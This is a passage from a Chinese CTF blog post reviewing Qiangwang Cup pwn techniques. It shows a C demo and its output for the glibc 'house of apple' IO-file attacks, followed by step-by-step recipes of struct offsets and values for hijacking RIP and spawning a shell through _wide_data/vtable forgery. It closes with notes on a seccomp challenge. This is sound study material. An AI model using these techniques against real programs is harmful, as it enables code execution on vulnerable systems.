class="keyword">for</span> (<span class="type">size_t</span> i = <span class="number">0</span>; i &lt; <span class="number">4</span>; i++)</span><br><span class="line">    &#123;</span><br><span class="line">        <span class="built_in">printf</span>(<span class="string">&quot;[%p]: 0x%016lx  0x%016lx\n&quot;</span>, tmp, tmp[<span class="number">0</span>], tmp[<span class="number">1</span>]);</span><br><span class="line">        tmp += <span class="number">2</span>;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="built_in">puts</span>(<span class="string">&quot;===========================new value=======================&quot;</span>);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>



<p>发现使用的glibc版本是 2.34 ubuntu3.2</p>
<figure class="highlight c"><table><tr><td class="code"><pre><span class="line">❯ ./demo</span><br><span class="line">[*] allocate a <span class="number">0x100</span> chunk</span><br><span class="line">===========================old value=======================</span><br><span class="line">[<span class="number">0x644b012fb2a0</span>]: <span class="number">0x1122334455667788</span>  <span class="number">0x1122334455667788</span></span><br><span class="line">[<span class="number">0x644b012fb2b0</span>]: <span class="number">0x1122334455667788</span>  <span class="number">0x1122334455667788</span></span><br><span class="line">[<span class="number">0x644b012fb2c0</span>]: <span class="number">0x1122334455667788</span>  <span class="number">0x1122334455667788</span></span><br><span class="line">[<span class="number">0x644b012fb2d0</span>]: <span class="number">0x1122334455667788</span>  <span class="number">0x1122334455667788</span></span><br><span class="line">===========================old value=======================</span><br><span class="line">[*] <span class="built_in">puts</span> address: <span class="number">0x73d622e80ef0</span></span><br><span class="line">[*] <span class="built_in">stderr</span>-&gt;_IO_write_ptr address: <span class="number">0x73d62301a6a8</span></span><br><span class="line">[*] <span class="built_in">stderr</span>-&gt;_flags2 address: <span class="number">0x73d62301a6f4</span></span><br><span class="line">[*] <span class="built_in">stderr</span>-&gt;_wide_data address: <span class="number">0x73d62301a720</span></span><br><span class="line">[*] <span class="built_in">stderr</span>-&gt;vtable address: <span class="number">0x73d62301a758</span></span><br><span class="line">[*] _IO_wstrn_jumps address: <span class="number">0x73d623015dc0</span></span><br><span class="line">[+] step <span class="number">1</span>: change <span class="built_in">stderr</span>-&gt;_IO_write_ptr to <span class="number">-1</span></span><br><span class="line">[+] step <span class="number">2</span>: change <span class="built_in">stderr</span>-&gt;_flags2 to <span class="number">8</span></span><br><span class="line">[+] step <span class="number">3</span>: replace <span class="built_in">stderr</span>-&gt;_wide_data with the allocated chunk</span><br><span class="line">[+] step <span class="number">4</span>: replace <span class="built_in">stderr</span>-&gt;vtable with _IO_wstrn_jumps</span><br><span class="line">[+] step <span class="number">5</span>: call fcloseall and trigger house of apple</span><br><span class="line">===========================new value=======================</span><br><span class="line">[<span class="number">0x644b012fb2a0</span>]: <span class="number">0x000073d62301a770</span>  <span class="number">0x000073d62301a870</span></span><br><span class="line">[<span class="number">0x644b012fb2b0</span>]: <span class="number">0x000073d62301a770</span>  <span class="number">0x000073d62301a770</span></span><br><span class="line">[<span class="number">0x644b012fb2c0</span>]: <span class="number">0x000073d62301a770</span>  <span class="number">0x000073d62301a770</span></span><br><span class="line">[<span class="number">0x644b012fb2d0</span>]: <span class="number">0x000073d62301a770</span>  <span class="number">0x000073d62301a870</span></span><br><span class="line">===========================new value=======================</span><br></pre></td></tr></table></figure>



<p>总体上来说，house_of_apple1，将一个largebin_attack的initialtive扩展到了任意地址写入已知地址，便于进一步利用。前提是能够泄露libc和heap地址。</p>
<p>利用思路</p>
<p>一、 修改Tcache线程变量tcache_pthread_struct</p>
<p>二、 修改mp_结构体:<code>_IO_wstrn_overflow</code>函数修改<code>mp_.tcache_bins</code>为很大的值</p>
<p>三、 修改pointer_guard 打 house of emma。</p>
<p>四、 修改global_max_fast 释放超大的<code>chunk</code>，去覆盖掉<code>point_guard</code>或者<code>tcache</code>变量。<code>house of apple + house of corrision</code>。</p>
<h3 id="house-of-apple2"><a href="#house-of-apple2" class="headerlink" title="house_of_apple2"></a>house_of_apple2</h3><p>神级的利用方法，出现的概率特别高！</p>
<p>前提:</p>
<ul>
<li><p>heap泄露+libc泄露</p>
</li>
<li><p>控制程序执行io操作main return,exit,__malloc_assert..</p>
</li>
<li><p>劫持vtable  和  _wide_data，一般使用largebin attack 控制</p>
</li>
</ul>
<p>原理: 和house_of_apple一致，也是利用了_wide_vtable 指针没有被检查合法性，而是直接通过宏去调用了它内部的指针。 </p>
<p>可以劫持<code>IO_FILE</code>的<code>vtable</code>为<code>_IO_wfile_jumps</code>，控制<code>_wide_data</code>为可控的堆地址空间，进而控制<code>_wide_data-&gt;_wide_vtable</code>为可控的堆地址空间。控制程序执行<code>IO</code>流函数调用，最终调用到<code>_IO_Wxxxxx</code>函数即可控制程序的执行流。</p>
<h4 id="利用链"><a href="#利用链" class="headerlink" title="利用链"></a>利用链</h4><blockquote>
<p>利用的最终目的不是wfile_overflow ，而是通过 IO_OVERFLOW 跳转到wfile_jumps 内部的函数，通过这个函数做中转，再跳转到另一个wfile_jumps 中的函数,强网杯这次的题就非常灵活的利用到了这个思想。</p>
</blockquote>
<p><strong>Roderick 大佬提供的三个比较方便的利用链:</strong></p>
<figure class="highlight plaintext"><table><tr><td class="code"><pre><span class="line">_IO_wfile_overflow</span><br><span class="line">    _IO_wdoallocbuf</span><br><span class="line">        _IO_WDOALLOCATE</span><br><span class="line">            *(fp-&gt;_wide_data-&gt;_wide_vtable + 0x68)(fp)</span><br></pre></td></tr></table></figure>

<p>伪造:</p>
<ul>
<li><code>_flags</code>设置为<code>~(2 | 0x8 | 0x800)</code>，如果不需要控制<code>rdi</code>，设置为<code>0</code>即可；如果需要获得<code>shell</code>，可设置为 <code>sh;</code>，注意前面有两个空格</li>
<li><code>vtable</code>设置为<code>_IO_wfile_jumps/_IO_wfile_jumps_mmap/_IO_wfile_jumps_maybe_mmap</code>地址（加减偏移），使其能成功调用<code>_IO_wfile_overflow</code>即可</li>
<li><code>_wide_data</code>设置为可控堆地址<code>A</code>，即满足<code>*(fp + 0xa0) = A</code></li>
<li><code>_wide_data-&gt;_IO_write_base</code>设置为<code>0</code>，即满足<code>*(A + 0x18) = 0</code></li>
<li><code>_wide_data-&gt;_IO_buf_base</code>设置为<code>0</code>，即满足<code>*(A + 0x30) = 0</code></li>
<li><code>_wide_data-&gt;_wide_vtable</code>设置为可控堆地址<code>B</code>，即满足<code>*(A + 0xe0) = B</code></li>
<li><code>_wide_data-&gt;_wide_vtable-&gt;doallocate</code>设置为地址<code>C</code>用于劫持<code>RIP</code>，即满足<code>*(B + 0x68) = C</code></li>
</ul>
<figure class="highlight plaintext"><table><tr><td class="code"><pre><span class="line">_IO_wfile_underflow_mmap</span><br><span class="line">    _IO_wdoallocbuf</span><br><span class="line">        _IO_WDOALLOCATE</span><br><span class="line">            *(fp-&gt;_wide_data-&gt;_wide_vtable + 0x68)(fp)</span><br></pre></td></tr></table></figure>

<ul>
<li><code>_flags</code>设置为<code>~4</code>，如果不需要控制<code>rdi</code>，设置为<code>0</code>即可；如果需要获得<code>shell</code>，可设置为 <code>sh;</code>，注意前面有个空格</li>
<li><code>vtable</code>设置为<code>_IO_wfile_jumps_mmap</code>地址（加减偏移），使其能成功调用<code>_IO_wfile_underflow_mmap</code>即可</li>
<li><code>_IO_read_ptr &lt; _IO_read_end</code>，即满足<code>*(fp + 8) &lt; *(fp + 0x10)</code></li>
<li><code>_wide_data</code>设置为可控堆地址<code>A</code>，即满足<code>*(fp + 0xa0) = A</code></li>
<li><code>_wide_data-&gt;_IO_read_ptr &gt;= _wide_data-&gt;_IO_read_end</code>，即满足<code>*A &gt;= *(A + 8)</code></li>
<li><code>_wide_data-&gt;_IO_buf_base</code>设置为<code>0</code>，即满足<code>*(A + 0x30) = 0</code></li>
<li><code>_wide_data-&gt;_IO_save_base</code>设置为<code>0</code>或者合法的可被<code>free</code>的地址，即满足<code>*(A + 0x40) = 0</code></li>
<li><code>_wide_data-&gt;_wide_vtable</code>设置为可控堆地址<code>B</code>，即满足<code>*(A + 0xe0) = B</code></li>
<li><code>_wide_data-&gt;_wide_vtable-&gt;doallocate</code>设置为地址<code>C</code>用于劫持<code>RIP</code>，即满足<code>*(B + 0x68) = C</code></li>
</ul>
<figure class="highlight plaintext"><table><tr><td class="code"><pre><span class="line">_IO_wdefault_xsgetn</span><br><span class="line">    __wunderflow</span><br><span class="line">        _IO_switch_to_wget_mode</span><br><span class="line">            _IO_WOVERFLOW</span><br><span class="line">                *(fp-&gt;_wide_data-&gt;_wide_vtable + 0x18)(fp)</span><br></pre></td></tr></table></figure>



<ul>
<li><code>_flags</code>设置为<code>0x800</code></li>
<li><code>vtable</code>设置为<code>_IO_wstrn_jumps/_IO_wmem_jumps/_IO_wstr_jumps</code>地址（加减偏移），使其能成功调用<code>_IO_wdefault_xsgetn</code>即可</li>
<li><code>_mode</code>设置为大于<code>0</code>，即满足<code>*(fp + 0xc0) &gt; 0</code></li>
<li><code>_wide_data</code>设置为可控堆地址<code>A</code>，即满足<code>*(fp + 0xa0) = A</code></li>
<li><code>_wide_data-&gt;_IO_read_end == _wide_data-&gt;_IO_read_ptr</code>设置为<code>0</code>，即满足<code>*(A + 8) = *A</code></li>
<li><code>_wide_data-&gt;_IO_write_ptr &gt; _wide_data-&gt;_IO_write_base</code>，即满足<code>*(A + 0x20) &gt; *(A + 0x18)</code></li>
<li><code>_wide_data-&gt;_wide_vtable</code>设置为可控堆地址<code>B</code>，即满足<code>*(A + 0xe0) = B</code></li>
<li><code>_wide_data-&gt;_wide_vtable-&gt;overflow</code>设置为地址<code>C</code>用于劫持<code>RIP</code>，即满足<code>*(B + 0x18) = C</code></li>
</ul>
<p>另外 要求rdx 不为0</p>
<h3 id="house-of-apple3"><a href="#house-of-apple3" class="headerlink" title="house_of_apple3"></a>house_of_apple3</h3><p>在劫持<code>FILE-&gt;_codecvt</code>的基础上，直接控制程序执行流。</p>
<p>使用条件和 house of apple2 几乎相同</p>
<p>如果是伪造整个结构体 需要合适的_wide_data  如果只能伪造部分FILE成员，就保持fp-&gt;_wide_data是默认地址</p>
<p>感觉这玩意不如house_of_apple2 好用，直接贴链接得了</p>
<p><a target="_blank" rel="noopener" href="https://bbs.kanxue.com/thread-273863.htm">[原创]House of apple 一种新的glibc中IO攻击方法 (3)-Pwn-看雪论坛-安全社区|非营利性质技术交流社区</a></p>
<h3 id="bph-1"><a href="#bph-1" class="headerlink" title="bph"></a>bph</h3><p>这个题的独特之处在于，最初可以任意写入的部分就在libc 内部的_IO_file ，因此相比最原始的 house_of_apple2 ，更加灵活。 但是同时 ，程序使用了seccomp 沙箱限制了要打orw ,这就导致不好通过一个backdoor 解决，于是想到通过<code>setcontext</code>中的gadget进行栈迁移。但是这就需要能够提前控制rdx。</p>
<p>基于house_of_apple2 的核心思想，通过wfile_jumps中的一个函数进行中转。最后执行任意函数，那么这里wfile_jumps中就应该找一个可以伪造rdx的函数，任意函数就是setcontext。</p>
</div></section><div id="reward-container"><span class="hty-icon-button button-glow" id="reward-button" title="打赏" onclick="var qr = document.getElementById(&quot;qr&quot;); qr.style.display = (qr.style.display === &quot;none&quot;) ? &quot;block&quot; : &quot;none&quot;;"><span class="icon iconify" data-icon="ri:hand-coin-line"></span></span><div id="reward-comment">v我50.</div><div id="qr" style="display:none;"><div style="display:inline-block"><a href="/QRpay/WechatPay.jpg"><img loading="lazy" src="/QRpay/WechatPay.jpg" alt="微信" title="微信"></a><div><span style="color:#2DC100"><span class="icon iconify" data-icon="ri:wechat-pay-line"></span></span></div></div></div></div><ul class="post-copyright"><li class="post-copyright-author"><strong>本文作者：</strong>py</li><li class="post-copyright-link"><strong>本文链接：</strong><a href="http://juryorca.github.io/2025/10/21/%E5%BC%B7%E7%B6%B2%E6%9D%AF%E5%BE%A9%E7%9B%A4/" title="強網杯復盤">http://juryorca.github.io/2025/10/21/%E5%BC%B7%E7%B6%B2%E6%9D%AF%E5%BE%A9%E7%9B%A4/</a></li><li class="post-copyright-license"><strong>版权声明：</strong>本博客所有文章除特别声明外，均默认采用 <a href="https://creativecommons.org/licenses/by-nc-sa/4.0/deed.zh" target="_blank" rel="noopener" title="CC BY-NC-SA 4.0 "><span class="icon iconify" data-icon="ri:creative-commons-line"></span><span class="icon iconify" data-icon="ri:creative-commons-by-line"></span><span class="icon iconify" data-icon="ri:creative-commons-nc-line"></span><span class="icon iconify" data-icon="ri:creative-commons-sa-line"></span></a> 许可协议。</li></ul></article><div class="post-nav"><div class="post-nav-item"><a class="post-nav-prev" href="/2025/10/27/%E5%AD%A6%E4%B9%A0%E9%95%9C%E5%83%8F%E7%AB%99%E6%90%AD%E5%BB%BA/" rel="prev" title="学习镜像站搭建"><span class="icon iconify" data-icon="ri:arrow-left-s-line"></span><span class="post-nav-text">学习镜像站搭建</span></a></div><div class="post-nav-item"><a class="post-nav-next" href="/2025/10/16/bomblab/" rel="next" title="Bomb_LAB实验报告"><span class="post-nav-text">Bomb_LAB实验报告</span><span class="icon iconify" data-icon="ri:arrow-right-s-line"></span></a></div></div></div><div class="hty-card" id="comment"></div></main><footer class="sidebar-translate" id="footer"><div class="copyright"><span>&copy; 2019 – 2025 </span><span class="with-love" id="animate"><span class="icon iconify" data-icon="ri:cloud-line"></span></span><span class="author"> py</span></div><div class="powered"><span>由 <a href="https://hexo.io" target="_blank" rel="noopener">Hexo</a> 驱动 v7.3.0</span><span class="footer-separator">|</span><span>主题 - <a rel="noopener" href="https://github.com/YunYouJun/hexo-theme-yun" target="_blank"><span>Yun</span></a> v1.10.11</span></div></footer></div><a class="hty-icon-button" id="back-to-top" aria-label="back-to-top" href="#"><span class="icon iconify" data-icon="ri:arrow-up-s-line"></span><svg class="progress-circle-container" viewBox="0 0 100 100"><circle class="progress-circle" id="progressCircle" cx="50" cy="50" r="48" fill="none" stroke="#0078E7" stroke-width="2" stroke-linecap="round"></circle></svg></a><script src="https://fastly.jsdelivr.net/npm/medium-zoom@1.0.6/dist/medium-zoom.min.js"></script><script>const images = [...document.querySelectorAll('.markdown-body img')]
mediumZoom(images)</script><style>.medium-zoom-image {
  z-index: 99;
}</style></body></html>